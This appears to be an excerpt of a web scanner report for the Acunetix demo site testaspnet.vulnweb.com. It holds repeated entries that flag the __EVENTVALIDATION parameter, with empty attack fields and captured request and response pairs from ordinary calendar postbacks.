URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1061 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,061 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8366&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMDEUwrQ2ghkZGSXUPK%2F74PbDx4xHQUxUIkGCdqQOg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLquovgDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNNufQws7HFUO9kuiD94k2XlS4At
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:44 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMDEUwrQ2ghkZGSXUPK/74PbDx4xHQUxUIkGCdqQOg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLquovgDgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNNufQws7HFUO9kuiD94k2XlS4At" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:White" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8350&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAKK13w9oIZGRkR8mX75l56ehgBjrNC4T15ZmoD%2BE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLQx5HFCgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA6Du71WtZiuZiS7cH4vRS0fYRRvt
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:11:39 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAKK13w9oIZGRkR8mX75l56ehgBjrNC4T15ZmoD+E=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLQx5HFCgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA6Du71WtZiuZiS7cH4vRS0fYRRvt" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:White" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
